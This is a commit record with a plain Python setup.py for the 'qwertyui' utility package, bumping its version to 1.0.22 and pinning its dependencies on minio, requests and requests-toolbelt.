<commit_msg>Update package versions, bump to 1.0.22<commit_after>#!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.22',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==4.0.3',
'requests==2.19.1',
'requests-toolbelt==0.8.0',
]
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.